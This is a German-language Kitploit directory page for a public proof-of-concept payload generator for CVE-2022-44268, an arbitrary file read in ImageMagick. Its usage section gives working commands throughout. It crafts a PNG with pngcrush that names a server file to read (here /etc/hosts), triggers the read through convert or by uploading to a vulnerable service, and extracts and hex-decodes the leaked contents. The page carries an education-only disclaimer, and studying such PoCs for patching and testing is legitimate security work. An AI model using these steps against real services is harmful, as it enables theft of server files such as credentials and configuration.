Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — PoC-Payload-Generator für die Schwachstelle CVE-2022-44268 (beliebiges Auslesen von Dateien in ImageMagick). Demonstriert die Ausnutzung mittels präparierter PNG-Dateien für pädagogische Sicherheitstests. | Kitploit
Tools/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

PoC-Payload-Generator für die Schwachstelle CVE-2022-44268 (beliebiges Auslesen von Dateien in ImageMagick). Demonstriert die Ausnutzung mittels präparierter PNG-Dateien für pädagogische Sicherheitstests.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2753748vor 3 JahrenVon Kitploit geprüft
Teilen

CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien

PoC für CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien - Payload-Generator

Dieses Projekt wurde nur zu Bildungszwecken erstellt und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden.

Der Autor dieses Projekts übernimmt keine Verantwortung für mögliche Schäden, die durch die Materialien dieses Projekts verursacht werden.

Ursprüngliche Entdeckung:

https://www.metabaseq.com/imagemagick-zero-days/

Verwendung:

Abhängigkeiten installieren:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

Ändern Sie den Dateinamen, den Sie lesen möchten, unten:

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

Bestätigen, dass alles einwandfrei funktioniert hat

3. $ exiv2 -pS pngout.png

Lösen Sie das PoC über convert aus oder laden Sie das Bild auf den anfälligen Dienst hoch:

4. $ convert pngout.png gopro.png

Inhalt der gelesenen Datei anzeigen:

5. $ identify -verbose gopro.png

Inhalt entschlüsseln:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

Demo

Getestet mit Ubuntu 22.04 und standardmäßig installiertem ImageMagick.

Tool herunterladen